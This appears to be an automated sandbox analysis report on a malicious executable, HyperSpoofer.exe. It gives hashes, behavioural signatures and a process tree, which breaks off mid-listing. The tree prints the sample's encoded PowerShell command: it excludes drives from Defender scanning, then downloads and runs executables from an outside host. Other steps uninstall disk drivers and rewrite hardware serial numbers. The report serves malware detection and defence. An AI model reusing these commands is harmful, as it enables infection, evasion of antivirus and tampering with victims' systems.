Resubmissions

03-08-2024 01:39

240803-b22z2stbpg 10

03-08-2024 01:35

240803-bzp8gatbjb 10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    03-08-2024 01:39

General

  • Target

    HyperSpoofer.exe

  • Size

    2.5MB

  • MD5

    d90e6ad485a94bf54e434b58d3f5ac5c

  • SHA1

    97d3d35fb31c029febce56204d2f6f2753dbd284

  • SHA256

    b55454760356e6ec102c5b3b999488973f8b7baed94eddf9e11be838f0c6901e

  • SHA512

    aabea05a6015a47da10131599ae12ecd41a0f84e49c252ae1ea99e333e233efd1a62619bbd6379d295fdd3e3c8551b10d76021d27e55c56e5592866091caf9c6

  • SSDEEP

    49152:75UzLWWq+T82bgnJslTuOFKtRoQrNRD73g71+20Z5UbRrthRkeq:75xWq+T82qc5QjNJ3sCUdnM

Malware Config

Signatures

  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 2 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Maps connected drives based on registry 3 TTPs 30 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 29 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 60 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\HyperSpoofer.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2624
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwB6AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABuAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzAGQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBpAHQAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAeAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAGUAcABmACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGMAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbABtAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAYgBkAHMAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAHoAZwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABnAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBuAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBkAGYAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwAvAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwAsACAAPAAjAGEAYwBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBpAHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBoAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAKQA8ACMAeABuAG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgBjAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGgAcgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApADwAIwBzAGYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAG4AaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBoAGcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAPAAjAGUAcgBoACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAZgB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBsAGYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwApADwAIwBtAG4AZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB6AGQAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQBlAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACkAPAAjAHIAcAB6ACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2696
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: RMLL-9BFO
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: RMLL-9BFO
            5⤵
            • Executes dropped EXE
            PID:2120
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:712
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1704
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1200
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1164
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2372
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1280
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2324
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1084
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:320
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1080
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1252
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2160
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3060
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1924
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2948
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2320
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
          • Loads dropped DLL
          PID:528
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1033HP-TRGT20205AB
            5⤵
            • Executes dropped EXE
            PID:1732
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
          4⤵
            PID:2988
            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21033HP-TRGT20205RV
              5⤵
              • Executes dropped EXE
              PID:2212
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
            4⤵
              PID:2144
              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81036HP-TRGT30954SG
                5⤵
                • Executes dropped EXE
                PID:2404
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
              4⤵
                PID:1800
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                  5⤵
                  • Executes dropped EXE
                  PID:1568
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                4⤵
                  PID:2772
                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51036HP-TRGT30954SL
                    5⤵
                    • Executes dropped EXE
                    PID:2240
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                  4⤵
                    PID:2064
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41036HP-TRGT30954FA
                      5⤵
                      • Executes dropped EXE
                      PID:2684
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                    4⤵
                      PID:2556
                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61036HP-TRGT30954FU
                        5⤵
                        • Executes dropped EXE
                        PID:2996
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                      4⤵
                        PID:2588
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31036HP-TRGT30954DQ
                          5⤵
                          • Executes dropped EXE
                          PID:2532
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                        4⤵
                          PID:1736
                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71036HP-TRGT30954MST
                            5⤵
                            • Executes dropped EXE
                            PID:2960
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                          4⤵
                            PID:820
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                              5⤵
                              • Executes dropped EXE
                              PID:1488
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                            4⤵
                              PID:1304
                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1052HP-TRGT19160AB
                                5⤵
                                • Executes dropped EXE
                                PID:3044
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                              4⤵
                                PID:1916
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21052HP-TRGT19160RV
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2792
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                4⤵
                                  PID:2196
                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81052HP-TRGT19160SG
                                    5⤵
                                    • Executes dropped EXE
                                    PID:2532
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                  4⤵
                                    PID:2076
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                      5⤵
                                      • Executes dropped EXE
                                      PID:2588
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                    4⤵
                                      PID:2788
                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51052HP-TRGT19160SL
                                        5⤵
                                        • Executes dropped EXE
                                        PID:2192
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                      4⤵
                                        PID:2848
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41052HP-TRGT19160FA
                                          5⤵
                                          • Executes dropped EXE
                                          PID:1496
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                        4⤵
                                          PID:3000
                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 61052HP-TRGT19160FU
                                            5⤵
                                            • Executes dropped EXE
                                            PID:292
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                          4⤵
                                            PID:2224
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 31052HP-TRGT19160DQ
                                              5⤵
                                              • Executes dropped EXE
                                              PID:2660
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                            4⤵
                                              PID:2620
                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 71052HP-TRGT19160MST
                                                5⤵
                                                • Executes dropped EXE
                                                PID:2592
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                              4⤵
                                                PID:2608
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2804
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                4⤵
                                                  PID:3048
                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 1069HP-TRGT7366AB
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2476
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                  4⤵
                                                    PID:1948
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 21069HP-TRGT7366RV
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:1704
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                    4⤵
                                                      PID:1972
                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 81069HP-TRGT7366SG
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:1996
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                      4⤵
                                                        PID:2916
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:844
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                        4⤵
                                                          PID:2068
                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 51069HP-TRGT7366SL
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:2008
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                          4⤵
                                                            PID:2320
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 41069HP-TRGT7366FA
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:1588
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                            4⤵
                                                              PID:2032
